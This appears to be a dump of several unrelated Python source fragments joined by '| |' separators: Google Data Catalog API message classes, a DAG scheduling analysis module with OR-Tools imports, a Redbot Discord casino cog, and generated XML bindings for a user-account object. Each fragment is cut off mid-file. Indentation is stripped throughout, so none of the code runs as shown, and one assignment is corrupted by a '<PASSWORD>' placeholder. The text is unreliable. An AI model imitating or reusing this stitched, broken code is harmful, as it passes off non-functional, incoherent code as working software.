resource to be passed as the request body.
name: The Data Catalog resource name of the entry in URL format. Example:
* projects/{project_id}/locations/{location}/entryGroups/{entry_group_id
}/entries/{entry_id} Note that this Entry and its child resources may
not actually be stored in the location in this name.
updateMask: The fields to update on the entry. If absent or empty, all
modifiable fields are updated. The following fields are modifiable: *
For entries with type `DATA_STREAM`: * `schema` * For entries with
type `FILESET` * `schema` * `display_name` * `description` *
`gcs_fileset_spec` * `gcs_fileset_spec.file_patterns`
"""
googleCloudDatacatalogV1beta1Entry = _messages.MessageField('GoogleCloudDatacatalogV1beta1Entry', 1)
name = _messages.StringField(2, required=True)
updateMask = _messages.StringField(3)
class DatacatalogProjectsLocationsEntryGroupsEntriesTagsCreateRequest(_messages.Message):
r"""A DatacatalogProjectsLocationsEntryGroupsEntriesTagsCreateRequest
object.
Fields:
googleCloudDatacatalogV1beta1Tag: A GoogleCloudDatacatalogV1beta1Tag
resource to be passed as the request body.
parent: Required. The name of the resource to attach this tag to. Tags can
be attached to Entries. Example: * projects/{project_id}/locations/{loc
ation}/entryGroups/{entry_group_id}/entries/{entry_id} Note that this
Tag and its child resources may not actually be stored in the location
in this name.
"""
googleCloudDatacatalogV1beta1Tag = _messages.MessageField('GoogleCloudDatacatalogV1beta1Tag', 1)
parent = _messages.StringField(2, required=True)
class DatacatalogProjectsLocationsEntryGroupsEntriesTagsDeleteRequest(_messages.Message):
r"""A DatacatalogProjectsLocationsEntryGroupsEntriesTagsDeleteRequest
object.
Fields:
name: Required. The name of the tag to delete. Example: * projects/{proje
ct_id}/locations/{location}/entryGroups/{entry_group_id}/entries/{entry_
id}/tags/{tag_id}
"""
name = _messages.StringField(1, required=True)
class DatacatalogProjectsLocationsEntryGroupsEntriesTagsListRequest(_messages.Message):
r"""A DatacatalogProjectsLocationsEntryGroupsEntriesTagsListRequest object.
Fields:
pageSize: The maximum number of tags to return. Default is 10. Max limit
is 1000.
pageToken: Token that specifies which page is requested. If empty, the
first page is returned.
parent: Required. The name of the Data Catalog resource to list the tags
of. The resource could be an Entry.
"""
pageSize = _messages.IntegerField(1, variant=_messages.Variant.INT32)
pageToken = _messages.StringField(2)
parent = _messages.StringField(3, required=True)
class DatacatalogProjectsLocationsEntryGroupsEntriesTagsPatchRequest(_messages.Message):
r"""A DatacatalogProjectsLocationsEntryGroupsEntriesTagsPatchRequest object.
Fields:
googleCloudDatacatalogV1beta1Tag: A GoogleCloudDatacatalogV1beta1Tag
resource to be passed as the request body.
name: The resource name of the tag in URL format. Example: * projects/{pr
oject_id}/locations/{location}/entrygroups/{entry_group_id}/entries/{ent
ry_id}/tags/{tag_id} where `tag_id` is a system-generated identifier.
Note that this Tag may not actually be stored in the location in this
name.
updateMask: The fields to update on the Tag. If absent or empty, all
modifiable fields are updated. Currently the only modifiable field is
the field `fields`.
"""
googleCloudDatacatalogV1beta1Tag = _messages.MessageField('GoogleCloudDatacatalogV1beta1Tag', 1)
name = _messages.StringField(2, required=True)
updateMask = _messages.StringField(3)
class DatacatalogProjectsLocationsEntryGroupsEntriesTestIamPermissionsRequest(_messages.Message):
r"""A
DatacatalogProjectsLocationsEntryGroupsEntriesTestIamPermissionsRequest
object.
Fields:
resource: REQUIRED: The resource for which the policy detail is being
requested. See the operation documentation for the appropriate value for
this field.
testIamPermissionsRequest: A TestIamPermissionsRequest resource to be
passed as the request body.
"""
resource = _messages.StringField(1, required=True)
testIamPermissionsRequest = _messages.MessageField('TestIamPermissionsRequest', 2)
class DatacatalogProjectsLocationsEntryGroupsGetIamPolicyRequest(_messages.Message):
r"""A DatacatalogProjectsLocationsEntryGroupsGetIamPolicyRequest object.
Fields:
getIamPolicyRequest: A GetIamPolicyRequest resource to be passed as the
request body.
resource: REQUIRED: The resource for which the policy is being requested.
See the operation documentation for the appropriate value for this
field.
"""
getIamPolicyRequest = _messages.MessageField('GetIamPolicyRequest', 1)
resource = _messages.StringField(2, required=True)
class DatacatalogProjectsLocationsEntryGroupsGetRequest(_messages.Message):
r"""A DatacatalogProjectsLocationsEntryGroupsGetRequest object.
Fields:
name: Required. The name of the entry group. For example,
`projects/{project_id}/locations/{location}/entryGroups/{entry_group_id}
`.
readMask: The fields to return. If not set or empty, all fields are
returned.
"""
name = _messages.StringField(1, required=True)
readMask = _messages.StringField(2)
class DatacatalogProjectsLocationsEntryGroupsSetIamPolicyRequest(_messages.Message):
r"""A DatacatalogProjectsLocationsEntryGroupsSetIamPolicyRequest object.
Fields:
resource: REQUIRED: The resource for which the policy is being specified.
See the operation documentation for the appropriate value for this
field.
setIamPolicyRequest: A SetIamPolicyRequest resource to be passed as the
request body.
"""
resource = _messages.StringField(1, required=True)
setIamPolicyRequest = _messages.MessageField('SetIamPolicyRequest', 2)
class DatacatalogProjectsLocationsEntryGroupsTestIamPermissionsRequest(_messages.Message):
r"""A DatacatalogProjectsLocationsEntryGroupsTestIamPermissionsRequest
object.
Fields:
resource: REQUIRED: The resource | |
<gh_stars>0
import numpy as np
import math
import copy
from collections import deque
import time
import collections
from ortools.sat.python import cp_model
from algorithms import heavy_cp
# Calculate the longest path of a given DAG task
def longest_path_dag(adjacency) -> float:
cost = np.zeros(adjacency.shape)
num_nodes = adjacency.shape[0]
for k in range(num_nodes):
for i in range(num_nodes):
if k == 0:
cost[i, :] = (adjacency.diagonal()[i] + adjacency.diagonal()[:]) * adjacency[i, :]
cost[np.triu_indices(num_nodes)] = -np.inf
else:
cost[i, :] = np.maximum(cost[i, :], cost[i, k] + cost[k, :] - adjacency[k, k])
return max(max(adjacency.diagonal()), cost.max())
# HGSH method to schedule a heavy task on $pro_a$ type A processors and $pro_b$ processors
# Return the feasibility: 1-schedulable (response time <= period/deadline) 0-otherwise
def hgsh(task, processor):
# copy the original DAG task
task_org = copy.deepcopy(task)
# mantain another copy that can be modified accordingly
task_scaled = copy.deepcopy(task)
# store the processor infomation
# index 0: the number of processor A
# index 1: the number of processor B
processors = copy.deepcopy(processor)
if processors[0] == 0:
vol_sum = (task_org[1][-2]/processors[1]) * task_org[-1][-1]
elif processors[1] == 0:
vol_sum = (task_org[1][-3] / processors[0]) * task_org[-1][-1]
else:
vol_sum = (task_org[1][-3] / processors[0] + task_org[1][-2] / processors[1]) * task_org[-1][-1]
# delete the additional information
task_scaled[0][0] = 0
task_scaled[-1][-1] = 0
for i in range(1, int(task_org[0][0] - 1)):
task_scaled[i][i] = task_scaled[i][i] * (1 - (1 / (processors[int(task_org[0][i]) - 1])))
response_time = vol_sum + longest_path_dag(task_scaled)
return response_time
def emu_assign(task_org, available_a, available_b, penalty_a, penalty_b):
# upper bound for processor A and B
task = copy.deepcopy(task_org)
if math.ceil(task[1][-3]) < available_a or math.ceil(task[1][-2]) < available_b:
return False
ub_a = int(available_a + 1)
ub_b = int(available_b + 1)
current_best = [0, 0]
penalty = 3
for i in range(math.ceil(task[1][-3]), ub_a):
for j in range(math.ceil(task[1][-2]), ub_b):
penalty_temp = i * penalty_a + j * penalty_b
if (hgsh(task, [i, j]) <= task[-1][-1]) and (penalty_temp < penalty):
penalty = penalty_temp
current_best[0] = i
current_best[1] = j
break
if current_best[0] != 0 and current_best[1] != 0:
return current_best
else:
return False
def greedy_assign(task_org, available_a, available_b, penalty_a, penalty_b):
task = copy.deepcopy(task_org)
current_a = math.ceil(task[1][-3])
current_b = math.ceil(task[1][-2])
if current_a < available_a or current_b < available_b:
return False
response_time = hgsh(task, [current_a, current_b])
while response_time > task[-1][-1] and current_a <= available_a and current_b <= available_b:
temp_rt_a = hgsh(task, [(current_a + 1), current_b])
temp_rt_b = hgsh(task, [current_a, (current_b + 1)])
if (response_time - temp_rt_a - penalty_a) > (response_time - temp_rt_b - penalty_b):
response_time = temp_rt_a
current_a = current_a + 1
else:
response_time = temp_rt_b
current_b = current_b + 1
if response_time < task[-1][-1]:
return [current_a, current_b]
else:
return False
# calculate the ceiling for utilization on processor A and B
def lb_processor(task):
util = [0, 0]
for i in range(1, int(task[0][0] - 1)):
util[int(task[0][i]) - 1] = util[int(task[0][i]) - 1] + task[i][int(task[0][0] - 1)]
# lower bound for processor A and B
util[0] = int(math.ceil(util[0]))
util[1] = int(math.ceil(util[1]))
return util
# calculate the volume of a DAG task (sum of the WCET of all nodes)
def vol_dag(task):
# vol for (sum, A, B)
return [task[0][-1]*task[-1][-1], task[1][-3]*task[-1][-1], task[1][-2]*task[-1][-1]]
# schedule light tasks on processor A and B
def sched_light(light_tsks, processor_a, processor_b):
light_tasks = copy.deepcopy(light_tsks)
h_priority = []
for i in range(0, len(light_tasks)):
if len(h_priority) > 0:
# initial response time equals to the volume of the DAG task
x_k = vol_dag(light_tasks[i])[0]
R_pre = vol_dag(light_tasks[i])[0]
R_k = 0
while (R_k != R_pre) and (R_k <= light_tasks[i][-1][-1]):
w_a = 0
w_b = 0
for j in range(0, len(h_priority)):
w_a = w_a + (vol_dag(h_priority[j])[1] * math.ceil(R_pre / h_priority[j][-1][-1]))
w_b = w_b + (vol_dag(h_priority[j])[2] * math.ceil(R_pre / h_priority[j][-1][-1]))
R_k = x_k + math.ceil(w_a / processor_a + w_b / processor_b)
if R_k == R_pre:
h_priority.append(light_tasks[i])
break
else:
R_pre = R_k
if R_k > light_tasks[i][-1][-1]:
return 0
else:
# the task with highest priority
h_priority.append(light_tasks[i])
# if all light tasks can be scheduled
return 1
# suspension time processor a
def suspension_a(task, processor_b):
s_a = task[2][-2] + ((task[1][-2] * task[-1][-1] - task[2][-2]) / processor_b)
return s_a
# suspension time processor b
def suspension_b(task, processor_a):
s_b = task[2][-3] + ((task[1][-3] * task[-1][-1] - task[2][-3]) / processor_a)
return s_b
# the sum of ceiling for task with higher priorities: heavy_a
# task_hp = [[task, R_i]...]
def sum_hp_a(time_t, tasks_hp):
sum = 0
for i in range(len(tasks_hp)):
sum = sum + math.ceil((((time_t + tasks_hp[i][1]) / tasks_hp[i][0][-1][-1]) - tasks_hp[i][0][1][-2])) * tasks_hp[i][0][1][-2] * tasks_hp[i][0][-1][-1]
return sum
# the sum of ceiling for task with higher priorities: heavy_b
# task_hp = [[task, R_i]...]
def sum_hp_b(time_t, tasks_hp):
sum = 0
for i in range(len(tasks_hp)):
sum = sum + math.ceil((((time_t + tasks_hp[i][1]) / tasks_hp[i][0][-1][-1]) - tasks_hp[i][0][1][-3])) * tasks_hp[i][0][1][-3] * tasks_hp[i][0][-1][-1]
return sum
# schedulability heavy a on 1 B core
def sched_heavy_a(task_new, tasks_hp, processor_a):
if processor_a <= 0:
return False
constant_cs = task_new[1][-2] * task_new[-1][-1] + suspension_b(task_new, processor_a)
# the first task on processor A
if len(tasks_hp) == 0:
return constant_cs
time_t = 10 ** (-5)
response_time = 0
start_time = time.time()
while time_t <= task_new[-1][-1] and time.time() - start_time < 1200:
response_time = constant_cs + sum_hp_a(time_t, tasks_hp)
if response_time <= time_t:
return response_time
else:
time_t = response_time
return False
# schedulability heavy b on 1 A core
def sched_heavy_b(task_new, tasks_hp, processor_b):
if processor_b <= 0:
return False
constant_cs = task_new[1][-3] * task_new[-1][-1] + suspension_a(task_new, processor_b)
# the first task on processor A
if len(tasks_hp) == 0:
return constant_cs
time_t = 10 ** (-5)
response_time = 0
start_time = time.time()
while time_t <= task_new[-1][-1] and time.time() - start_time < 1200:
response_time = constant_cs + sum_hp_b(time_t, tasks_hp)
if response_time <= time_t:
return response_time
else:
time_t = response_time
return False
# schedule a light task on one a core and one b core
def sched_light_fix(light_task, task_hp_a, task_hp_b):
wcet_new = light_task[0][-1] * light_task[-1][-1]
# if both a and b processor is empty
if len(task_hp_a) == 0 and len(task_hp_b) == 0:
return wcet_new
time_t = 10 ** (-5)
response_time = 0
start_time = time.time()
while time_t <= light_task[-1][-1] and time.time() - start_time < 1200:
response_time = wcet_new + sum_hp_a(time_t, task_hp_b) + sum_hp_b(time_t, task_hp_a)
if response_time <= time_t:
return response_time
else:
time_t = response_time
return False
# calculate the number of processor A if only processor A is required
def only_processor_a(task_org, available_a):
task = copy.deepcopy(task_org)
current_available_a = copy.deepcopy(available_a)
for i in range(1, current_available_a+1):
if hgsh(task, [i, 0]) <= task[-1][-1]:
return int(i)
return 0
# calculate the number of processor B if only processor B is required
def only_processor_b(task_org, available_b):
task = copy.deepcopy(task_org)
current_available_b = copy.deepcopy(available_b)
for i in range(1, current_available_b+1):
if hgsh(task, [0, i]) <= task[-1][-1]:
return int(i)
return 0
# federated scheduling according to Meiling Han's paper
# with different processor assignment method
# mod 0: emu assignment
# mod 1: greedy method
def sched_han(taskst, available_a, available_b, mod):
taskset = copy.deepcopy(taskst)
current_available_a = copy.deepcopy(available_a)
current_available_b = copy.deepcopy(available_b)
penalty_a = 1 / current_available_a
penalty_b = 1 / current_available_b
light_tasks = []
for i in range(0, len(taskset)):
# check if the task only require one type of processor
# only require processor A:
# ("utilization A:", )
if taskset[i][1][-2] == 0:
# print("partitioned", taskset[i][0])
used_a = only_processor_a(taskset[i], current_available_a)
if used_a > 0:
current_available_a = current_available_a - used_a
else:
return 0
# only require processor B:
if taskset[i][1][-3] == 0:
used_b = only_processor_b(taskset[i], current_available_b)
if used_b > 0:
current_available_b = current_available_b - used_b
else:
return 0
# try to divide the tasks into heavy and light
# heavy task: density > 1 -> volume > period
if taskset[i][0][-1] > 1:
# different processor assignment methods
if mod == 1:
assigned = emu_assign(taskset[i], current_available_a, current_available_b, penalty_a, penalty_b)
else:
assigned = greedy_assign(taskset[i], current_available_a, current_available_b, penalty_a, penalty_b)
# update the current available processors
if assigned:
current_available_a = current_available_a - assigned[0]
current_available_b = current_available_b - assigned[1]
else:
return 0
# no sufficient processors for heavy tasks
if current_available_a < 0 or current_available_b < 0:
return 0
# store all light tasks here
else:
light_tasks.append(taskset[i])
# HERE: Do we need to consider how to allocate light tasks on the available processors?
# for example, try to share as much as possible like the improved version.
# if there is only one light task, check | |
# Developed by Redjumpman for Redbot.
# Inspired by Spriter's work on a modded economy.
# Creates 1 json file, 1 log file per 10mb, and requires tabulate.
# STD Library
import asyncio
import gettext
import logging
import logging.handlers
import os
import random
from copy import deepcopy
from fractions import Fraction
from operator import itemgetter
from datetime import datetime, timedelta
# Discord imports
import discord
from .utils import checks
from .utils.dataIO import dataIO
from discord.ext import commands
from __main__ import send_cmd_help
# Third Party Libraries
from tabulate import tabulate
from dateutil import parser
try:
l_path = "data/JumperCogs/casino/data/languages.json"
lang_data = dataIO.load_json(l_path)
lang_default = lang_data["Language"]
language_set = gettext.translation('casino', localedir='data/JumperCogs/casino/data',
languages=[lang_default])
language_set.install()
except FileNotFoundError:
_ = lambda s: s
# Default settings that is created when a server begin's using Casino
server_default = {"System Config": {"Casino Name": "Redjumpman", "Casino Open": True,
"Chip Name": "Jump", "Chip Rate": 1, "Default Payday": 100,
"Payday Timer": 1200, "Threshold Switch": False,
"Threshold": 10000, "Credit Rate": 1, "Transfer Limit": 1000,
"Transfer Cooldown": 30, "Version": 1.715
},
"Memberships": {},
"Players": {},
"Games": {"Dice": {"Multiplier": 2.2, "Cooldown": 5, "Open": True, "Min": 50,
"Max": 500, "Access Level": 0},
"Coin": {"Multiplier": 1.5, "Cooldown": 5, "Open": True, "Min": 10,
"Max": 10, "Access Level": 0},
"Cups": {"Multiplier": 2.2, "Cooldown": 5, "Open": True, "Min": 50,
"Max": 500, "Access Level": 0},
"Blackjack": {"Multiplier": 2.2, "Cooldown": 5, "Open": True,
"Min": 50, "Max": 500, "Access Level": 0},
"Allin": {"Multiplier": 2.2, "Cooldown": 43200, "Open": True,
"Access Level": 0},
"Hi-Lo": {"Multiplier": 1.5, "Cooldown": 5, "Open": True,
"Min": 20, "Max": 20, "Access Level": 0},
"War": {"Multiplier": 1.5, "Cooldown": 5, "Open": True,
"Min": 20, "Max": 20, "Access Level": 0},
}
}
new_user = {"Chips": 100,
"Membership": None,
"Pending": 0,
"Played": {"Dice Played": 0, "Cups Played": 0, "BJ Played": 0, "Coin Played": 0,
"Allin Played": 0, "Hi-Lo Played": 0, "War Played": 0},
"Won": {"Dice Won": 0, "Cups Won": 0, "BJ Won": 0, "Coin Won": 0, "Allin Won": 0,
"Hi-Lo Won": 0, "War Won": 0},
"Cooldowns": {"Dice": 0, "Cups": 0, "Coin": 0, "Allin": 0, "Hi-Lo": 0, "War": 0,
"Blackjack": 0, "Payday": 0, "Transfer": 0}
}
# Deck used for blackjack, and a dictionary to correspond values of the cards.
main_deck = ['2', '3', '4', '5', '6', '7', '8', '9', '10', 'Jack', 'Queen', 'King', 'Ace'] * 4
bj_values = {'2': 2, '3': 3, '4': 4, '5': 5, '6': 6, '7': 7, '8': 8, '9': 9, '10': 10, 'Jack': 10,
'Queen': 10, 'King': 10}
war_values = {'2': 2, '3': 3, '4': 4, '5': 5, '6': 6, '7': 7, '8': 8, '9': 9, '10': 10, 'Jack': 11,
'Queen': 12, 'King': 13, 'Ace': 14}
c_games = ["Blackjack", "Coin", "Allin", "Cups", "Dice", "Hi-Lo", "War"]
class CasinoError(Exception):
pass
class UserAlreadyRegistered(CasinoError):
pass
class UserNotRegistered(CasinoError):
pass
class InsufficientChips(CasinoError):
pass
class NegativeChips(CasinoError):
pass
class SameSenderAndReceiver(CasinoError):
pass
class BotNotAUser(CasinoError):
pass
class CasinoBank:
"""Holds all of the Casino hooks for integration"""
def __init__(self, bot, file_path):
self.memberships = dataIO.load_json(file_path)
self.bot = bot
self.patch = 1.715
def create_account(self, user):
server = user.server
path = self.check_server_settings(server)
if user.id not in path["Players"]:
default_user = deepcopy(new_user)
path["Players"][user.id] = default_user
path["Players"][user.id]["Name"] = user.name
self.save_system()
membership = path["Players"][user.id]
return membership
else:
raise UserAlreadyRegistered()
def membership_exists(self, user):
try:
self.get_membership(user)
except UserNotRegistered:
return False
return True
def chip_balance(self, user):
account = self.get_membership(user)
return account["Chips"]
def can_bet(self, user, amount):
account = self.get_membership(user)
if account["Chips"] >= amount:
return True
else:
raise InsufficientChips()
def set_chips(self, user, amount):
if amount < 0:
raise NegativeChips()
account = self.get_membership(user)
account["Chips"] = amount
self.save_system()
def deposit_chips(self, user, amount):
amount = int(round(amount))
if amount < 0:
raise NegativeChips()
account = self.get_membership(user)
account["Chips"] += amount
self.save_system()
def withdraw_chips(self, user, amount):
if amount < 0:
raise NegativeChips()
account = self.get_membership(user)
if account["Chips"] >= amount:
account["Chips"] -= amount
self.save_system()
else:
raise InsufficientChips()
def transfer_chips(self, sender, receiver, amount):
if amount < 0:
raise NegativeChips()
if sender is receiver:
raise SameSenderAndReceiver()
if receiver == self.bot.user:
raise BotNotAUser()
if self.membership_exists(sender) and self.membership_exists(receiver):
sender_acc = self.get_membership(sender)
if sender_acc["Chips"] < amount:
raise InsufficientChips()
self.withdraw_chips(sender, amount)
self.deposit_chips(receiver, amount)
else:
raise UserNotRegistered()
def wipe_caisno_server(self, server):
self.memberships["Servers"].pop(server.id)
self.save_system()
def wipe_casino_members(self, server):
self.memberships["Servers"][server.id]["Players"] = {}
self.save_system()
def remove_membership(self, user):
server = user.server
self.memberships["Servers"][server.id]["Players"].pop(user.id)
self.save_system()
def get_membership(self, user):
server = user.server
path = self.check_server_settings(server)
try:
return path["Players"][user.id]
except KeyError:
raise UserNotRegistered()
def get_all_servers(self):
return self.memberships["Servers"]
def get_casino_server(self, server):
return self.memberships["Servers"][server.id]
def get_server_memberships(self, server):
if server.id in self.memberships["Servers"]:
members = self.memberships["Servers"][server.id]["Players"]
return members
else:
return []
def save_system(self):
dataIO.save_json("data/JumperCogs/casino/casino.json", self.memberships)
def check_server_settings(self, server):
if server.id not in self.memberships["Servers"]:
self.memberships["Servers"][server.id] = server_default
self.save_system()
print(_("Creating default casino settings for Server: {}").format(server.name))
path = self.memberships["Servers"][server.id]
return path
else:
path = self.memberships["Servers"][server.id]
try:
if path["System Config"]["Version"] < self.patch:
self.casino_patcher(path)
path["System Config"]["Version"] = self.patch
except KeyError:
path["System Config"]["Version"] = self.patch
self.casino_patcher(path)
return path
def casino_patcher(self, path):
if path["System Config"]["Version"] < 1.706:
self.patch_1581(path)
self.patch_1692(path)
self.patch_1694(path)
self.patch_16(path)
if path["System Config"]["Version"] < 1.712:
self.patch_1712(path)
if path["System Config"]["Version"] < 1.715:
self.patch_1715(path)
# Save changes and return updated dictionary.
self.save_system()
def name_fix(self):
servers = self.get_all_servers()
removal = []
for server in servers:
try:
server_obj = self.bot.get_server(server)
self.name_bug_fix(server_obj)
except AttributeError:
removal.append(server)
logger.info("WIPED SERVER: {} FROM CASINO".format(server))
print(_("Removed server ID: {} from the list of servers, because the bot is no "
"longer on that server.").format(server))
for x in removal:
self.memberships["Servers"].pop(x)
self.save_system()
def name_bug_fix(self, server):
players = self.get_server_memberships(server)
for player in players:
mobj = server.get_member(player)
try:
# noinspection PyTypeChecker
if mobj.name != players[player]["Name"]:
players[player]["Name"] = mobj.name
except AttributeError:
print(_("Error updating name! {} is no longer on this server.").format(player))
def patch_games(self, path):
# Check if player data has the war game, and if not add it.
for player in path["Players"]:
if "War Played" not in path["Players"][player]["Played"]:
path["Players"][player]["Played"]["War Played"] = 0
if "War Won" not in path["Players"][player]["Won"]:
path["Players"][player]["Won"]["War Won"] = 0
if "War" not in path["Players"][player]["Cooldowns"]:
path["Players"][player]["Cooldowns"]["War"] = 0
self.save_system()
def patch_1715(self, path):
"""Fix transfer issues"""
for player in path["Players"]:
path["Players"][player]["Cooldowns"] = {}
path["Players"][player]["Cooldowns"]["Allin"] = 0
path["Players"][player]["Cooldowns"]["Blackjack"] = 0
path["Players"][player]["Cooldowns"]["Coin"] = 0
path["Players"][player]["Cooldowns"]["Cups"] = 0
path["Players"][player]["Cooldowns"]["Dice"] = 0
path["Players"][player]["Cooldowns"]["Hi-Lo"] = 0
path["Players"][player]["Cooldowns"]["Payday"] = 0
path["Players"][player]["Cooldowns"]["Transfer"] = 0
path["Players"][player]["Cooldowns"]["War"] = 0
self.save_system()
def patch_1712(self, path):
"""Fixes older players in the casino who didn't have war or hi-lo"""
hilo_data = {"Played": {"Hi-Lo Played": 0}, "Won": {"Hi-Lo Won": 0},
"Cooldown": {"Hi-Lo": 0}}
war_data = {"Played": {"War Played": 0}, "Won": {"War Won": 0}, "Cooldown": {"War": 0}}
for player in path["Players"]:
if "Hi-Lo Played" not in path["Players"][player]["Played"]:
self.player_update(path["Players"][player], hilo_data)
if "War Played" not in path["Players"][player]["Played"]:
self.player_update(path["Players"][player], war_data)
self.save_system()
def player_update(self, player_data, new_game, path=None):
"""Helper function to add new data into the player's data"""
if path is None:
path = []
for key in new_game:
if key in player_data:
if isinstance(player_data[key], dict) and isinstance(new_game[key], dict):
self.player_update(player_data[key], new_game[key], path + [str(key)])
elif player_data[key] == new_game[key]:
pass
else:
raise Exception(_("Conflict at {}").format("".join(path + [str(key)])))
else:
player_data[key] = new_game[key]
self.save_system()
def patch_1694(self, path):
"""This patch aimed at converting the old cooldown times into unix time."""
print(_("patch_1694 ran"))
for player in path["Players"]:
try:
for cooldown in path["Players"][player]["Cooldowns"]:
s = path["Players"][player]["Cooldowns"][cooldown]
convert = datetime.utcnow() - timedelta(seconds=s)
path["Players"][player]["Cooldowns"][cooldown] = convert.isoformat()
except TypeError:
pass
self.save_system()
def patch_1692(self, path):
"""Issues with memberships storing keys that are lower case.
Fire bombing everyones memberships so I don't have nightmares.
"""
path["Memberships"] = {}
self.save_system()
def patch_16(self, path):
if "Transfer Limit" not in path["System Config"]:
transfer_dict = {"Transfer Limit": 1000, "Transfer Cooldown": 30}
path["System Config"].update(transfer_dict)
for x in path["Players"]:
if "Transfer" not in path["Players"][x]["Cooldowns"]:
path["Players"][x]["Cooldowns"]["Transfer"] = 0
self.save_system()
def patch_1581(self, path):
# Fixes the name bug for older versions
self.name_fix()
# Add hi-lo to older versions
if "Hi-Lo" not in path["Games"]:
hl = {"Hi-Lo": {"Multiplier": 1.5, "Cooldown": 0, "Open": True, "Min": 20,
"Max": 20}}
path["Games"].update(hl)
# Add war to older versions
if "War" not in path["Games"]:
war = {"War": {"Multiplier": 1.5, "Cooldown": 0, "Open": True, "Min": 50,
"Max": 100}}
path["Games"].update(war)
# Add membership changes from patch 1.5 to older versions
trash = ["Membership Lvl 0", "Membership Lvl 1", "Membership Lvl 2",
"Membership Lvl 3"]
new = {"Threshold Switch": False, "Threshold": 10000, "Default Payday": 100,
"Payday Timer": 1200}
for k, v in new.items():
if k not in path["System Config"]:
path["System Config"][k] = v
if "Memberships" not in path:
path["Memberships"] = {}
# Game access levels added
for x in | |
self.Last_Login
def set_Last_Login(self, Last_Login): self.Last_Login = Last_Login
def get_Privilege_List(self): return self.Privilege_List
def set_Privilege_List(self, Privilege_List): self.Privilege_List = Privilege_List
def get_Script_Path(self): return self.Script_Path
def set_Script_Path(self, Script_Path): self.Script_Path = Script_Path
def get_Username(self): return self.Username
def set_Username(self, Username): self.Username = Username
def get_User_Password_Age(self): return self.User_Password_Age
def set_User_Password_Age(self, User_Password_Age): self.User_Password_Age = User_Password_Age
def get_password_required(self): return self.password_required
def set_password_required(self, password_required): self.password_required = password_<PASSWORD>
def export(self, outfile, level, namespace_='UserAccountObj:', name_='UserAccountObjectType', namespacedef_=''):
showIndent(outfile, level)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = []
self.exportAttributes(outfile, level, already_processed, namespace_, name_='UserAccountObjectType')
if self.hasContent_():
outfile.write('>\n')
self.exportChildren(outfile, level + 1, 'UserAccountObj:', name_)
showIndent(outfile, level)
outfile.write('</%s%s>\n' % (namespace_, name_))
else:
outfile.write('/>\n')
def exportAttributes(self, outfile, level, already_processed, namespace_='UserAccountObj:', name_='UserAccountObjectType'):
super(UserAccountObjectType, self).exportAttributes(outfile, level, already_processed, namespace_, name_='UserAccountObjectType')
if self.password_required is not None and 'password_required' not in already_processed:
already_processed.append('password_required')
outfile.write(' password_required="%s"' % self.gds_format_boolean(self.gds_str_lower(str(self.password_required)), input_name='password_required'))
def exportChildren(self, outfile, level, namespace_='UserAccountObj:', name_='UserAccountObjectType', fromsubclass_=False):
if self.User_ID is not None:
self.User_ID.export(outfile, level, namespace_, name_='User_ID')
if self.Full_Name is not None:
self.Full_Name.export(outfile, level, namespace_, name_='Full_Name')
if self.Group_List is not None:
self.Group_List.export(outfile, level, namespace_, name_='Group_List')
if self.Home_Directory is not None:
self.Home_Directory.export(outfile, level, namespace_, name_='Home_Directory')
if self.Last_Login is not None:
self.Last_Login.export(outfile, level, namespace_, name_='Last_Login')
if self.Privilege_List is not None:
self.Privilege_List.export(outfile, level, namespace_, name_='Privilege_List')
if self.Script_Path is not None:
self.Script_Path.export(outfile, level, namespace_, name_='Script_Path')
if self.Username is not None:
self.Username.export(outfile, level, namespace_, name_='Username')
if self.User_Password_Age is not None:
self.User_Password_Age.export(outfile, level, namespace_, name_='User_Password_Age')
super(UserAccountObjectType, self).exportChildren(outfile, level, namespace_, name_, True)
def hasContent_(self):
if (
self.User_ID is not None or
self.Full_Name is not None or
self.Group_List is not None or
self.Home_Directory is not None or
self.Last_Login is not None or
self.Privilege_List is not None or
self.Script_Path is not None or
self.Username is not None or
self.User_Password_Age is not None
):
return True
else:
return False
def exportLiteral(self, outfile, level, name_='UserAccountObjectType'):
level += 1
self.exportLiteralAttributes(outfile, level, [], name_)
if self.hasContent_():
self.exportLiteralChildren(outfile, level, name_)
def exportLiteralAttributes(self, outfile, level, already_processed, name_):
if self.password_required is not None and 'password_required' not in already_processed:
already_processed.append('password_required')
showIndent(outfile, level)
outfile.write('password_required = %s,\n' % (self.password_required,))
def exportLiteralChildren(self, outfile, level, name_):
if self.User_ID is not None:
showIndent(outfile, level)
outfile.write('User_ID=%s,\n' % quote_python(self.User_ID).encode(ExternalEncoding))
if self.Full_Name is not None:
showIndent(outfile, level)
outfile.write('Full_Name=%s,\n' % quote_python(self.Full_Name).encode(ExternalEncoding))
if self.Group_List is not None:
showIndent(outfile, level)
outfile.write('Group_List=model_.GroupListType(\n')
self.Group_List.exportLiteral(outfile, level, name_='Group_List')
showIndent(outfile, level)
outfile.write('),\n')
if self.Home_Directory is not None:
showIndent(outfile, level)
outfile.write('Home_Directory=%s,\n' % quote_python(self.Home_Directory).encode(ExternalEncoding))
if self.Last_Login is not None:
showIndent(outfile, level)
outfile.write('Last_Login=%s,\n' % quote_python(self.Last_Login).encode(ExternalEncoding))
if self.Privilege_List is not None:
showIndent(outfile, level)
outfile.write('Privilege_List=model_.PrivilegeListType(\n')
self.Privilege_List.exportLiteral(outfile, level, name_='Privilege_List')
showIndent(outfile, level)
outfile.write('),\n')
if self.Script_Path is not None:
showIndent(outfile, level)
outfile.write('Script_Path=%s,\n' % quote_python(self.Script_Path).encode(ExternalEncoding))
if self.Username is not None:
showIndent(outfile, level)
outfile.write('Username=%s,\n' % quote_python(self.Username).encode(ExternalEncoding))
if self.User_Password_Age is not None:
showIndent(outfile, level)
outfile.write('User_Password_Age=%s,\n' % quote_python(self.User_Password_Age).encode(ExternalEncoding))
def build(self, node):
self.buildAttributes(node, node.attrib, [])
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
def buildAttributes(self, node, attrs, already_processed):
value = find_attr_value_('password_required', node)
if value is not None and 'password_required' not in already_processed:
already_processed.append('password_required')
if value in ('true', '1'):
self.password_required = True
elif value in ('false', '0'):
self.password_required = False
else:
raise_parse_error(node, 'Bad boolean attribute')
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
if nodeName_ == 'User_ID':
User_ID_ = common.StringObjectAttributeType.factory()
User_ID_.build(child_)
self.User_ID = User_ID_
elif nodeName_ == 'Full_Name':
Full_Name_ = common.StringObjectAttributeType.factory()
Full_Name_.build(child_)
